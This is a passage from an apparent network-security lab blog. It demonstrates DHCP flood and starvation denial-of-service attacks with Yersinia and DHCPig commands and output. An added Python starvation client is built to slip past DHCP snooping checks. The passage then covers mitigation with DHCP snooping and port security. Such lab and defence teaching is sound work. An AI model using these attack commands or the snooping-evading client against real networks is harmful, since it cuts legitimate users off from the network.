Full-duplex interception will be covered in the next post of this series.</p>
</div>
<h4 id="dos-attacks"><a class="toclink" href="#dos-attacks"><abbr title="Denial Of Service"><span class="caps">DOS</span></abbr> attacks</a></h4>
<h5 id="dhcp-discover-flood"><a class="toclink" href="#dhcp-discover-flood"><abbr title="Dynamic Host Configuration Protocol"><span class="caps">DHCP</span></abbr> <span class="caps">DISCOVER</span> flood</a></h5>
<table class="floatright">
<thead>
<tr><th>Lab</th><th>Compatible</th></tr>
</thead>
<tbody>
<tr><td>Dynamips</td><td class="yes" title="Yes"><span class="sr-only">Yes</span></td></tr>
<tr><td><span class="caps">IOU</span></td><td class="yes" title="Yes"><span class="sr-only">Yes</span></td></tr>
<tr><td>Real gear</td><td class="yes" title="Yes"><span class="sr-only">Yes</span></td></tr>
</tbody>
</table>
<p><a href="http://www.yersinia.net/" rel="external" title="Yersinia project homepage">Yersinia</a> offers a <abbr title="Dynamic Host Configuration Protocol"><span class="caps">DHCP</span></abbr> <span class="caps">DISCOVER</span> flood functionality.
It should not be confused with an actual <abbr title="Dynamic Host Configuration Protocol"><span class="caps">DHCP</span></abbr> starvation attack, as its
effect is far more temporary (which may or may not be an advantage, depending
on what you are trying to achieve).</p>
<p>In this attack, Yersinia sends <abbr title="Dynamic Host Configuration Protocol"><span class="caps">DHCP</span></abbr> <span class="caps">DISCOVER</span> messages to the <abbr title="Dynamic Host Configuration Protocol"><span class="caps">DHCP</span></abbr> server at a
very high rate, most probably far higher than what it can reasonably handle
(a <abbr title="Dynamic Host Configuration Protocol"><span class="caps">DHCP</span></abbr> server does not have the same performance requirements as, say, an
Internet-facing web server).
Depending on the server implementation, this attack may not even manage to
fill the <abbr title="Dynamic Host Configuration Protocol"><span class="caps">DHCP</span></abbr> server’s lease table, but it will effectively make the
<abbr title="Dynamic Host Configuration Protocol"><span class="caps">DHCP</span></abbr> server unavailable for the duration of the attack:</p>
<ul>
<li>
<p>Due to the load and locking issues, the <abbr title="Dynamic Host Configuration Protocol"><span class="caps">DHCP</span></abbr> server will be mostly
unable to process any legitimate request for the duration of the flood.</p>
</li>
<li>
<p>Once the flood stops, since Yersinia never answers the <span class="caps">OFFER</span> messages sent
by the server, the server automatically removes all flood-related entries
from its lease database after a relatively short timeout (five minutes in
this lab, but this varies with the <abbr title="Dynamic Host Configuration Protocol"><span class="caps">DHCP</span></abbr> server used).</p>
</li>
</ul>
<p>To launch the attack, use the following command:</p>
<div class="codehilite"><pre><span class="hll"><span class="gp">root@kali:~#</span> yersinia dhcp -attack 1
</span><span class="go">Warning: interface eth0 selected as the default one</span>
<span class="go"><*> Starting DOS attack sending DISCOVER packet...</span>
<span class="go"><*> Press any key to stop the attack <*></span>
</pre></div>
<p><em>R1</em> itself may now be unable to access its own lease database (the
command returns only after an internal timeout expires):</p>
<div class="codehilite"><pre><span class="gp">R1#</span><span class="k">show</span> ip dhcp pool VLAN1
<span class="go">% The DHCP database could not be locked. Please retry the command later.</span>
<span class="gp">R1#</span>
</pre></div>
<p>As stated above, the lease database remains unavailable this way for a short
while even after the end of the flood.
It is however only a matter of minutes before the <abbr title="Dynamic Host Configuration Protocol"><span class="caps">DHCP</span></abbr> server
automatically gets back to a working state.</p>
<h5 id="dhcp-starvation"><a class="toclink" href="#dhcp-starvation"><abbr title="Dynamic Host Configuration Protocol"><span class="caps">DHCP</span></abbr> starvation</a></h5>
<table class="floatright">
<thead>
<tr><th>Lab</th><th>Compatible</th></tr>
</thead>
<tbody>
<tr><td>Dynamips</td><td class="yes" title="Yes"><span class="sr-only">Yes</span></td></tr>
<tr><td><span class="caps">IOU</span></td><td class="yes" title="Yes"><span class="sr-only">Yes</span></td></tr>
<tr><td>Real gear</td><td class="yes" title="Yes"><span class="sr-only">Yes</span></td></tr>
</tbody>
</table>
<p>A well-implemented <abbr title="Dynamic Host Configuration Protocol"><span class="caps">DHCP</span></abbr> starvation attack can have far more impact.</p>
<p>This time the attacker will not attempt to temporarily drown the <abbr title="Dynamic Host Configuration Protocol"><span class="caps">DHCP</span></abbr> server
under tens of thousands of <span class="caps">DISCOVER</span> requests per second.
He will instead:</p>
<ol>
<li>Send the <span class="caps">DISCOVER</span> requests at a slower rate, allowing the <abbr title="Dynamic Host Configuration Protocol"><span class="caps">DHCP</span></abbr>
server to handle them properly.</li>
<li>Keep track of each <span class="caps">DISCOVER</span> sent (by transaction ID and client <span class="caps">MAC</span>
address) and wait for the matching <span class="caps">OFFER</span> reply.</li>
<li>Answer each <span class="caps">OFFER</span> with a well-formed <span class="caps">REQUEST</span>, so that the server
commits the <span class="caps">IP</span> lease.</li>
</ol>
<p>A <abbr title="Dynamic Host Configuration Protocol"><span class="caps">DHCP</span></abbr> server usually has a pool of a few hundred, maybe a few thousand,
available <span class="caps">IP</span> addresses.
With such an attack, this pool fills up in very little time, after which there
is no <span class="caps">IP</span> address left to distribute to newly connected devices, effectively
preventing them from accessing the network.</p>
<p><a href="https://github.com/kamorin/DHCPig" rel="external" title="DHCPig GitHub page">DHCPig</a> provides a good implementation of this attack, with configurable
retries, timeouts and threads to match various environments.
It offers a few more features, in particular:</p>
<ul>
<li>
<p>It can attempt to unregister live neighbours by forging <abbr title="Dynamic Host Configuration Protocol"><span class="caps">DHCP</span></abbr> <span class="caps">RELEASE</span>
messages on their behalf and sending them to the <abbr title="Dynamic Host Configuration Protocol"><span class="caps">DHCP</span></abbr> server.
The goal is to free their addresses so that the attacker can claim them,
leaving the hosts currently holding an <span class="caps">IP</span> address unable to renew it.</p>
</li>
<li>
<p>Once there are no free leases left, it can disconnect all Windows machines
by simulating <span class="caps">IP</span> address conflicts (this makes the Windows machines drop
their current address to fetch a new one from the <abbr title="Dynamic Host Configuration Protocol"><span class="caps">DHCP</span></abbr> server, but by
then there is no <span class="caps">IP</span> address available anymore…).</p>
</li>
<li>
<p>As a weak security measure, some <abbr title="Dynamic Host Configuration Protocol"><span class="caps">DHCP</span></abbr> servers probe the offered or
requested address before committing the lease (see the <span class="caps">ARP</span> requests sent by
<em>R1</em> in the output below) to check that a real device is behind the request.
DHCPig answers such probes.</p>
</li>
</ul>
<div class="admonition note">
<p class="admonition-title">Note</p>
<p>Sadly I did not manage to get the <span class="caps">RELEASE</span>-based attack described in the
first bullet to work, the legitimate client remaining the owner of the
<span class="caps">IP</span> address.
I don’t know at this time if this is a limitation of the <span class="caps">IOS</span>-based <abbr title="Dynamic Host Configuration Protocol"><span class="caps">DHCP</span></abbr>
server or a bug in DHCPig.</p>
<p>To reproduce this attack in the lab, it is therefore recommended to begin
with a freshly restarted <em>R1</em> and <em>Attacker</em> host and keep the <em>User_1</em>
host off.</p>
</div>
<p>To start the attack, simply give DHCPig the network interface to use:</p>
<div class="codehilite"><pre><span class="hll"><span class="gp">root@kali:~#</span> python ./pig.py eth0
</span><span class="go">[ -- ] [INFO] - using interface eth0</span>
<span class="go">[DBG ] Thread 0 - (Sniffer) READY</span>
<span class="go">[DBG ] Thread 1 - (Sender) READY</span>
<span class="go">[--->] DHCP_Discover</span>
<span class="go">[--->] DHCP_Discover</span>
<span class="go">[--->] DHCP_Discover</span>
<span class="go">[--->] DHCP_Discover</span>
<span class="go">[--->] DHCP_Discover</span>
<span class="go">[ ?? ] waiting for first DHCP Server response</span>
<span class="go">[<---] DHCP_Offer c2:01:0b:de:00:00 0.0.0.0 IP: 192.168.1.100 for MAC=[de:ad:0e:7c:60:f3]</span>
<span class="go">[--->] DHCP_Request 192.168.1.100</span>
<span class="go">[DBG ] ARP_Request 192.168.1.102 from 192.168.1.1</span>
<span class="go">[DBG ] ARP_Request 192.168.1.102 from 192.168.1.1</span>
<span class="go">[DBG ] ARP_Request 192.168.1.102 from 192.168.1.1</span>
<span class="go">[DBG ] ARP_Request 192.168.1.102 from 192.168.1.1</span>
<span class="go">[--->] DHCP_Discover</span>
<span class="go">[--->] DHCP_Discover</span>
<span class="go">[--->] DHCP_Discover</span>
<span class="go">[--->] DHCP_Discover</span>
<span class="go">... skipped ...</span>
<span class="go">[ -- ] timeout waiting on dhcp packet count 3</span>
<span class="go">[--->] DHCP_Discover</span>
<span class="go">[--->] DHCP_Discover</span>
<span class="go">[--->] DHCP_Discover</span>
<span class="go">[--->] DHCP_Discover</span>
<span class="go">[ ?? ] waiting for DHCP pool exhaustion...</span>
<span class="go">[--->] DHCP_Discover</span>
<span class="go">[--->] DHCP_Discover</span>
<span class="go">[--->] DHCP_Discover</span>
<span class="go">[ -- ] timeout waiting on dhcp packet count 4</span>
<span class="go">[ ?? ] waiting for DHCP pool exhaustion...</span>
<span class="go">[ -- ] [DONE] DHCP pool exhausted!</span>
<span class="gp">root@kali:~#</span>
</pre></div>
<p>Once the attack has ended, the <abbr title="Dynamic Host Configuration Protocol"><span class="caps">DHCP</span></abbr> pool is indeed full as all of the 100
available <span class="caps">IP</span> addresses are now “leased”:</p>
<div class="codehilite"><pre><span class="gp">R1#</span><span class="k">show</span> ip dhcp pool VLAN1
<span class="go">Pool VLAN1 :</span>
<span class="go">Utilization mark (high/low) : 100 / 0</span>
<span class="go">Subnet size (first/next) : 0 / 0</span>
<span class="go">Total addresses : 254</span>
<span class="hll"><span class="go">Leased addresses : 100</span>
</span><span class="go">Pending event : none</span>
<span class="go">1 subnet is currently in the pool :</span>
<span class="go">Current index IP address range Leased addresses</span>
<span class="go">0.0.0.0 192.168.1.1 - 192.168.1.254 100</span>
<span class="gp">R1#</span>
</pre></div>
<p>When the <em>User_1</em> host is then started, it is indeed unable to obtain an
<span class="caps">IP</span> address (there is no <code>inet addr</code> line for <code>eth0</code>) and cannot
join the network:</p>
<div class="codehilite"><pre><span class="gp">gns3@box:~$</span> ifconfig eth0
<span class="go">eth0 Link encap:Ethernet HWaddr 00:01:93:B7:01:00</span>
<span class="go"> inet6 addr: fe80::201:93ff:feb7:100/64 Scope:Link</span>
<span class="go"> UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1</span>
<span class="go"> RX packets:0 errors:0 dropped:0 overruns:0 frame:0</span>
<span class="go"> TX packets:12 errors:0 dropped:0 overruns:0 frame:0</span>
<span class="go"> collision:0 txqueuelen:1000</span>
<span class="go"> RXbytes:0 (0/0 KiB) TX bytes:2528 (2.4 KiB)</span>
<span class="gp">gns3@box:~$</span>
</pre></div>
<p>As stated earlier, <abbr title="Dynamic Host Configuration Protocol"><span class="caps">DHCP</span></abbr> lease time varies a lot depending on the environment,
from a few dozen minutes to a few weeks.
In most cases the network will therefore not recover on its own within an
acceptable delay: besides stopping the attack itself, a manual intervention on
the <abbr title="Dynamic Host Configuration Protocol"><span class="caps">DHCP</span></abbr> server is required to clear the bogus bindings
(<code>clear ip dhcp binding *</code> on an <span class="caps">IOS</span>-based server).</p>
<h3 id="mitigation"><a class="toclink" href="#mitigation">Mitigation</a></h3>
<p>To prevent these attacks you must enable <em>both</em> <abbr title="Dynamic Host Configuration Protocol"><span class="caps">DHCP</span></abbr> snooping and port security.</p>
<h4 id="dhcp-snooping"><a class="toclink" href="#dhcp-snooping"><abbr title="Dynamic Host Configuration Protocol"><span class="caps">DHCP</span></abbr> Snooping</a></h4>
<table class="floatright">
<thead>
<tr><th>Lab</th><th>Compatible</th></tr>
</thead>
<tbody>
<tr><td>Dynamips</td><td class="no" title="No"><span class="sr-only">No</span></td></tr>
<tr><td><span class="caps">IOU</span></td><td class="yes" title="Yes"><span class="sr-only">Yes</span></td></tr>
<tr><td>Real gear</td><td class="yes" title="Yes"><span class="sr-only">Yes</span></td></tr>
</tbody>
</table>
<p><abbr title="Dynamic Host Configuration Protocol"><span class="caps">DHCP</span></abbr> snooping is enabled on a per-<span class="caps">VLAN</span> basis on the access-layer
switches and takes care of several things:</p>
<ul>
<li>
<p>It creates a distinction between trusted ports and untrusted ports.</p>
<p>Clients are connected to untrusted ports and the trusted ports point toward
the network infrastructure and the legitimate <abbr title="Dynamic Host Configuration Protocol"><span class="caps">DHCP</span></abbr> server(s).</p>
</li>
<li>
<p>Invalid <abbr title="Dynamic Host Configuration Protocol"><span class="caps">DHCP</span></abbr> messages received on untrusted ports are dropped.</p>
<p>A message is deemed invalid for several reasons: the client hardware address
(<code>chaddr</code>) in the <abbr title="Dynamic Host Configuration Protocol"><span class="caps">DHCP</span></abbr> message does not match the source <span class="caps">MAC</span> address of
the Ethernet frame, a server message (<span class="caps">OFFER</span>, <span class="caps">ACK</span>, <span class="caps">NAK</span>) arrives on an
untrusted port, a message arriving on an untrusted port already carries relay
information (option 82 or a non-zero <code>giaddr</code>), or a <span class="caps">RELEASE</span> or
<span class="caps">DECLINE</span> refers to a binding recorded on a different port in the snooping
database.</p>
</li>
<li>
<p>Clients’ <abbr title="Dynamic Host Configuration Protocol"><span class="caps">DHCP</span></abbr> broadcast messages (<span class="caps">DISCOVER</span>, <span class="caps">REQUEST</span>) are forwarded only
through trusted ports.</p>
<p>A client will therefore not receive <abbr title="Dynamic Host Configuration Protocol"><span class="caps">DHCP</span></abbr> broadcasts from other clients anymore.</p>
</li>
<li>
<p><abbr title="Dynamic Host Configuration Protocol"><span class="caps">DHCP</span></abbr> messages are rate-limited.</p>
</li>
<li>
<p>The switch maintains a <abbr title="Dynamic Host Configuration Protocol"><span class="caps">DHCP</span></abbr> snooping database.</p>
<p>This database tracks various information: client’s <span class="caps">MAC</span> address, client’s <span class="caps">IP</span>
address as assigned by the <abbr title="Dynamic Host Configuration Protocol"><span class="caps">DHCP</span></abbr> server, client’s <span class="caps">VLAN</span>, remaining lease time
and the port the client is connected to.</p>
<p>We will see in the next post that this database can also be used to implement
other security features.</p>
</li>
</ul>
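<p>The procedure described in the <a href="#dhcp-starvation" title="DHCP starvation">DHCP starvation</a> section and the validity checks
listed above, put into code as an added example that is part neither of the
original post nor of DHCPig or of Cisco’s implementation.
It contains a minimal <span class="caps">RFC</span> 2131 message builder and parser written in plain
Python, a starvation client which tracks every <span class="caps">DISCOVER</span> it sends by transaction
ID and answers the matching <span class="caps">OFFER</span> with a <span class="caps">REQUEST</span> while keeping the Ethernet
source <span class="caps">MAC</span> address identical to the <code>chaddr</code> it carries, and a snooping
filter applying the checks a switch performs on untrusted ports.
Frames are in-memory objects rather than packets on the wire; the port names,
<span class="caps">IP</span> addresses and server <span class="caps">MAC</span> address are made up, and actually emitting the
payloads (which needs a raw socket) is deliberately left out.</p>

```python
import os
import struct
from dataclasses import dataclass

# DHCP message types (option 53) and the magic cookie opening the option list.
DISCOVER, OFFER, REQUEST, DECLINE, ACK, NAK, RELEASE = 1, 2, 3, 4, 5, 6, 7
MAGIC = b"\x63\x82\x53\x63"
ZERO_IP = b"\x00" * 4
HEADER = "!BBBBIHH4s4s4s4s16s64s128s"  # RFC 2131 fixed fields, 236 bytes


def build_dhcp(msg_type, client_mac, xid, yiaddr=ZERO_IP, requested_ip=None,
               server_id=None, giaddr=ZERO_IP, relay_info=None):
    """Serialise one DHCP message; chaddr always carries client_mac."""
    op = 2 if msg_type in (OFFER, ACK, NAK) else 1   # BOOTREPLY / BOOTREQUEST
    flags = 0x8000 if op == 1 else 0                 # client asks for broadcast reply
    header = struct.pack(HEADER, op, 1, 6, 0, xid, 0, flags, ZERO_IP, yiaddr,
                         ZERO_IP, giaddr, client_mac, b"", b"")  # struct zero-pads
    opts = [(53, bytes([msg_type])), (61, b"\x01" + client_mac)]
    if requested_ip is not None:
        opts.append((50, requested_ip))
    if server_id is not None:
        opts.append((54, server_id))
    if relay_info is not None:       # option 82, only a relay/switch should add it
        opts.append((82, relay_info))
    body = b"".join(bytes([code, len(val)]) + val for code, val in opts)
    return header + MAGIC + body + b"\xff"


def parse_dhcp(data):
    """Decode the fixed header and the option list into a dict."""
    f = struct.unpack(HEADER, data[:236])
    if data[236:240] != MAGIC:
        raise ValueError("not a DHCP message")
    options, i = {}, 240
    while i < len(data) and data[i] != 0xFF:          # 0xff = end option
        if data[i] == 0:                              # pad option
            i += 1
            continue
        code, length = data[i], data[i + 1]
        options[code] = data[i + 2:i + 2 + length]
        i += 2 + length
    return {"op": f[0], "xid": f[4], "yiaddr": f[8], "giaddr": f[10],
            "chaddr": f[11][:f[2]], "type": options.get(53, b"\0")[0],
            "options": options}


@dataclass
class Frame:
    """What the switch sees: Ethernet source MAC, ingress port, DHCP payload."""
    src_mac: bytes
    port: str
    dhcp: bytes


class StarvationClient:
    """Simulates many clients, each completing DISCOVER/OFFER/REQUEST/ACK so the
    server commits the lease. The Ethernet source MAC always equals chaddr."""

    def __init__(self, port="Et1/0"):              # port name is an assumption
        self.port, self.pending, self.leases = port, {}, {}

    def discover(self):
        mac = b"\xde\xad" + os.urandom(4)          # fake locally administered unicast MAC
        xid = struct.unpack("!I", os.urandom(4))[0]
        self.pending[xid] = mac                    # remember which fake client asked
        return Frame(mac, self.port, build_dhcp(DISCOVER, mac, xid))

    def handle(self, frame):
        """Feed a server message; returns the REQUEST to send back, or None."""
        msg = parse_dhcp(frame.dhcp)
        mac = self.pending.get(msg["xid"])
        if mac is None or msg["chaddr"] != mac:    # not for one of our fake clients
            return None
        if msg["type"] == OFFER:                   # confirm the offered address
            return Frame(mac, self.port, build_dhcp(
                REQUEST, mac, msg["xid"], requested_ip=msg["yiaddr"],
                server_id=msg["options"].get(54)))
        if msg["type"] == ACK:                     # lease committed by the server
            self.leases[msg["yiaddr"]] = self.pending.pop(msg["xid"])
        return None


def snooping_verdict(frame, trusted, bindings):
    """Main DHCP snooping checks on one frame. `bindings` maps a client MAC to
    the port held in the snooping database. Returns 'forward' or a drop reason."""
    msg = parse_dhcp(frame.dhcp)
    if trusted:
        return "forward"
    if msg["op"] == 2:
        return "drop: server message on untrusted port"
    if msg["chaddr"] != frame.src_mac:
        return "drop: chaddr does not match source MAC"
    if msg["giaddr"] != ZERO_IP or 82 in msg["options"]:
        return "drop: relay fields (giaddr/option 82) on untrusted port"
    if msg["type"] in (RELEASE, DECLINE) and bindings.get(msg["chaddr"]) != frame.port:
        return "drop: release/decline from a port other than the binding"
    return "forward"
```

<p>Because the starvation client sets the Ethernet source and <code>chaddr</code>
consistently for every fake client, its frames pass every check in
<code>snooping_verdict</code>, whereas a frame built the DHCPig way (spoofed
<code>chaddr</code>, real <span class="caps">NIC</span> address as Ethernet source) is dropped at the first
<span class="caps">MAC</span> comparison.
This is exactly why snooping alone is not enough and port security, which
caps the number of source <span class="caps">MAC</span> addresses per port, is needed on top of it.</p>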
<p><abbr title="Dynamic Host Configuration Protocol"><span class="caps">DHCP</span></abbr> snooping adds <abbr title="Dynamic Host Configuration Protocol"><span class="caps">DHCP</span></abbr> option 82
(<em>”<abbr title="Dynamic Host Configuration Protocol"><span class="caps">DHCP</span></abbr> Relay Agent Information Option”</em>) to the client messages it forwards
(messages arriving on untrusted ports with this option already set are
considered invalid).
A snooping switch inserts this option while leaving <code>giaddr</code> at zero, a
combination the <span class="caps">IOS</span>-based <abbr title="Dynamic Host Configuration Protocol"><span class="caps">DHCP</span></abbr> server drops by default, so you must
first tell the <abbr title="Dynamic Host Configuration Protocol"><span class="caps">DHCP</span></abbr> server on <em>R1</em> to trust such messages:</p>
<div class="codehilite"><pre><span class="gp">R1#</span><span class="k">conf</span> t
<span class="go">Enter configuration commands, one per line. End with CNTL/Z.</span>
<span class="hll"><span class="gp">R1(config)#</span><span class="k">ip</span> dhcp relay information trust-all
</span><span class="gp">R1(config)#</span><span class="nb">end</span>
<span class="gp">R1#</span>
<span class="gt">*Mar 1 00:49:13.755: %SYS-5-CONFIG_I: Configured from console by console</span>
<span class="gp">R1#</span><span class="k">copy</span> run start
<span class="go">Destination filename [startup-config]?</span>
<span class="go">Building configuration...</span>
<span class="go">[OK]</span>
<span class="gp">R1#</span>
</pre></div>
<p>Then you can enable <abbr title="Dynamic Host Configuration Protocol"><span class="caps">DHCP</span></abbr> snooping on all access layer switches:</p>
<div class="codehilite"><pre><span class="gp">IOU3#</span><span class="k">conf</span> t
<span class="go">Enter configuration commands, one per line. End with CNTL/Z.</span>
<span class="gp">IOU3(config)#</span><span class="c1">! Set the trusted port first to avoid any service interruption!</span>
<span class="gp">IOU3(config)#</span><span class="k">interface</span><span class="s"> ethernet 0/0</span>
<span class="hll"><span class="gp">IOU3(config-if)#</span><span class="k">ip</span> dhcp snooping trust
</span><span class="gp">IOU3(config-if)#</span><span class="nb">exit</span>
<span class="hll"><span class="gp">IOU3(config)#</span><span class="k">ip</span> dhcp snooping
</span><span class="hll"><span class="gp">IOU3(config)#</span><span class="k">ip</span> dhcp snooping vlan <span class="s">1-2</span>
</span><span class="gp">IOU3(config)#</span><span class="nb">end</span>
<span class="gp">IOU3#</span>
<span class="gt">*Oct 29 17:00:53.321: %SYS-5-CONFIG_I: Configured from console by console</span>
<span class="gp">IOU3#</span><span class="k">show</span> ip dhcp snooping
<span class="go">Switch DHCP snooping is enabled</span>
<span class="go">DHCP snooping is configured on following VLANs:</span>
<span class="go">1-2</span>
<span class="go">DHCP snooping is operational on following VLANs:</span>
<span class="go">1-2</span>
<span class="go">DHCP snooping is configured on the following L3 Interfaces:</span>
<span class="go">Insertion of option 82 is enabled</span>
<span class="go">circuit-id default format: vlan-mod-port</span>
<span class="go">remote-id: aabb.cc00.0500 (MAC)</span>
<span class="go">Option 82 on untrusted port is not allowed</span>
<span class="go">Verification of hwaddr field is enabled</span>
<span class="go">Verification of giaddr field is enabled</span>
<span class="go">DHCP snooping trust/rate is configured on the following Interfaces:</span>
<span class="go">Interface Trusted Allow option Rate limit (pps)</span>
<span class="go">----------------------- ------- ------------ ----------------</span>
<span class="go">Ethernet0/0 yes yes unlimited</span>
<span class="go">Custom circuit-ids:</span>
<span class="gp">IOU3#</span><span class="k">copy</span> run start
<span class="go">Destination filename [startup-config]?</span>
<span class="go">Building configuration...</span>
<span class="go">Compressed configuration from 1624 bytes to 936 bytes[OK]</span>
<span class="gp">IOU3#</span>
</pre></div>
<p>After having enabled <abbr title="Dynamic Host Configuration Protocol"><span class="caps">DHCP</span></abbr> snooping:</p>
<ul>
<li>
<p>The <abbr title="Dynamic Host Configuration Protocol"><span class="caps">DHCP</span></abbr> spoofing attack doesn’t work anymore, as Ettercap no longer
receives any broadcast <span class="caps">DISCOVER</span> or <span class="caps">REQUEST</span> message to reply to.</p>
<p>There is no error message anywhere: the attacker is simply deaf to the <abbr title="Dynamic Host Configuration Protocol"><span class="caps">DHCP</span></abbr>
exchanges occurring on other ports.</p>
</li>
<li>
<p>The <abbr title="Dynamic Host Configuration Protocol"><span class="caps">DHCP</span></abbr> starvation attack doesn’t work anymore, but this is due to a
current limitation of the tool rather than to the attack itself.</p>
<p>DHCPig’s messages are dropped by the switch, which logs the following
message:</p>
<div class="codehilite"><pre><span class="gp">IOU3#</span>
<span class="gt">*Oct 29 17:10:22.200: %DHCP_SNOOPING-5-DHCP_SNOOPING_MATCH_MAC_FAIL: DHCP_SNOOPING drop message because the chaddr doesn't match source mac, message type: DHCPDISCOVER, chaddr: dead.287e.8729, MAC sa: 0001.93e9.0e00</span>
<span class="gp">IOU3#</span>
</pre></div>
<p>While DHCPig correctly fakes the <span class="caps">MAC</span> address inside the <abbr title="Dynamic Host Configuration Protocol"><span class="caps">DHCP</span></abbr> message
(<code>chaddr</code>), it does not also spoof the source <span class="caps">MAC</span> address of the
Ethernet frame, so the two do not match and all its messages are dropped as
invalid.
A tool setting both consistently for each fake client would pass this check,
which is why <abbr title="Dynamic Host Configuration Protocol"><span class="caps">DHCP</span></abbr> snooping alone is not enough (see below).</p>
</li>
<li>
<p>Yersinia however correctly sets the Ethernet source <span class="caps">MAC</span> address to match
the <abbr title="Dynamic Host Configuration Protocol"><span class="caps">DHCP</span></abbr> message <span class="caps">MAC</span> address, therefore its <abbr title="Dynamic Host Configuration Protocol"><span class="caps">DHCP</span></abbr> <span class="caps">DISCOVER</span> flood
attack remains possible despite <abbr title="Dynamic Host Configuration Protocol"><span class="caps">DHCP</span></abbr> snooping being enabled.</p>
<p>The switch’s <abbr title="Dynamic Host Configuration Protocol"><span class="caps">DHCP</span></abbr> snooping process cannot keep up with the flood and starts
dropping packets:</p>
<div class="codehilite"><pre><span class="gp">IOU3#</span>
<span class="gt">*Oct 29 17:12:53.669: %DHCP_SNOOPING-4-QUEUE_FULL: Fail to enqueue DHCP packet into processing queue: dhcp_snoop_pakQ, the queue is most likely full and packet will be dropped.</span>
<span class="gp">IOU3#</span>
</pre></div>
<p>However the number of packets that still get through is sufficient to
effectively <abbr title="Denial Of Service"><span class="caps">DOS</span></abbr> our small lab <span class="caps">IOS</span>-based <abbr title="Dynamic Host Configuration Protocol"><span class="caps">DHCP</span></abbr> server.
Note that no explicit rate limit was configured on the untrusted ports here
(the <code>show ip dhcp snooping</code> output above lists none for them):
<code>ip dhcp snooping limit rate</code> on those interfaces would make the switch
err-disable a port exceeding the configured number of <abbr title="Dynamic Host Configuration Protocol"><span class="caps">DHCP</span></abbr> packets per
second, stopping the flood at its source.</p>
</li>
</ul>
<h4 id="port-security"><a class="toclink" href="#port-security">Port security</a></h4>
<table class="floatright">
<thead>
<tr><th>Lab</th><th>Compatible</th></tr>
</thead>
<tbody>
<tr><td>Dynamips</td><td class="no" title="No"><span class="sr-only">No</span></td></tr>
<tr><td><span class="caps">IOU</span></td><td class="yes" title="Yes"><span class="sr-only">Yes</span></td></tr>
<tr><td>Real gear</td><td class="yes" title="Yes"><span class="sr-only">Yes</span></td></tr>
</tbody>
</table>
<p>The attacks that managed to slip through <abbr title="Dynamic Host Configuration Protocol"><span class="caps">DHCP</span></abbr> snooping rely on the
attacker’s ability to simulate a large number of devices bearing different
<span class="caps">MAC</span> addresses.</p>
<p>For those of you who have read the <a href="/posts/2017/10/25/mac-address-table-overflow/" title="MAC address table overflow">previous article</a> from this series about
<span class="caps">MAC</span> address table overflow, this may ring a bell.
Indeed, for a complete protection against <abbr title="Dynamic Host Configuration Protocol"><span class="caps">DHCP</span></abbr>-based attacks, in addition to
<abbr title="Dynamic Host Configuration Protocol"><span class="caps">DHCP</span></abbr> snooping you must also enable port security.</p>
<p>Enabling Port Security is covered in the <a href="/posts/2017/10/25/mac-address-table-overflow/#mitigation" title="MAC address table overflow: mitigation">previous post</a>.</p>
<p>Now even Yersinia’s <abbr title="Dynamic Host Configuration Protocol"><span class="caps">DHCP</span></abbr> <span class="caps">DISCOVER</span> flooding attack gets successfully blocked:</p>
<div class="codehilite"><pre><span class="gp">IOU3#</span>
<span class="gt">*Oct 29 18:31:00.024: %PM-4-ERR_DISABLE: psecure-violation error detected on Et1/0, putting Et1/0 in err-disable state</span>
<span class="gp">IOU3#</span>
<span class="gt">*Oct 29 18:31:00.024: %PORT_SECURITY-2-PSECURE_VIOLATION: Security violation occurred, caused by MAC address 1009.c153.845c on port Ethernet1/0.</span>
<span class="gt">*Oct 29 18:31:01.024: %LINEPROTO-5-UPDOWN: Line protocol on Interface Ethernet1/0, changed state to down</span>
<span class="gp">IOU3#</span>
<span class="gt">*Oct 29 18:31:02.024: %LINK-3-UPDOWN: Interface Ethernet1/0, changed state to down</span>
<span class="gp">IOU3#</span>
</pre></div>
<p>Your lab is now safe… until the next post ;) !</p>
<div class="footnote">
<hr/>
<ol>
<li id="fn-ideal-world">
<p>Well, I can easily imagine a tool providing the best of both
worlds. First simulate a few devices to obtain a few IPs from the legitimate
server and maintain their leases so they remain valid, free and won’t be
allocated to other devices in the future. Then fake the <span class="caps">OFFER</span> packets and
distribute these addresses to the clients with custom network settings. <a class="footnote-backref" href="#fnref-ideal-world" title="Jump back to footnote 1 in the text">↩</a></p>
</li>
<li id="fn-configurable-leases">
<p>It would be nice for <abbr title="Dynamic Host Configuration Protocol"><span class="caps">DHCP</span></abbr> spoofing tools to let the
attacker configure the lease time to match the estimated attack duration.
This would allow intercepted clients to gracefully switch to the legitimate
network configuration at the end of the attack with little to no disruption.
Yersinia’s curses interface proposes such settings in its <abbr title="Dynamic Host Configuration Protocol"><span class="caps">DHCP</span></abbr> spoofing
attack, but this module seems incompletely implemented: it is present only in
the curses interface, very rough, and doesn’t seem to do anything. <a class="footnote-backref" href="#fnref-configurable-leases" title="Jump back to footnote 2 in the text">↩</a></p>
</li>
<li id="fn-NAT">
<p>In this case, Ettercap could even be made to distribute IPs from a
completely different and unused subnet, thus avoiding any <span class="caps">IP</span> range conflict.
Ettercap doesn’t allow that, but I have yet to check whether <a href="https://github.com/byt3bl33d3r/MITMf" rel="external" title="MITMf GitHub page">MITMf</a>, another
<abbr title="Man-In-The-Middle"><span class="caps">MITM</span></abbr> tool supporting <abbr title="Dynamic Host Configuration Protocol"><span class="caps">DHCP</span></abbr> server spoofing, supports this either by itself or
by relying on the standard Linux iptables to do the <span class="caps">NAT</span> part. <a class="footnote-backref" href="#fnref-NAT" title="Jump back to footnote 3 in the text">↩</a></p>
</li>
</ol>
</div>
<h2 id="mac-address-table-overflow">MAC address table overflow</h2>
<p>Published 2017-10-25 by WhiteWinterWolf (<a href="https://www.whitewinterwolf.com/posts/2017/10/25/mac-address-table-overflow/" title="MAC address table overflow">original post</a>).</p>
<p>The main practical difference between a legacy hub and a switch is that the
switch does its best to forward Ethernet frames only on the port leading to
the <em>recipient</em>, instead of blindly forwarding everything everywhere as a
dumb hub would do.</p>
<p>To achieve this, upon reception of a frame the switch stores the <em>sender’s</em> <abbr title="Media Access Control"><span class="caps">MAC</span></abbr>
address, associated to the input port, in an internal memory, usually implemented
as a <abbr title="Content Addressable Memory"><span class="caps">CAM</span></abbr> table.
Thanks to this information, when a later frame bears this same address as
<em>recipient</em>, the switch forwards it only to this port and not to the other ones.</p>
<p>I already wrote a more focused article on <abbr title="Media Access Control"><span class="caps">MAC</span></abbr> table overflow within the context
of <span class="caps">GNS3</span> simulated environments, which resulted in a patch being submitted
upstream and initiated the development of the <code>macof.py</code> tool.
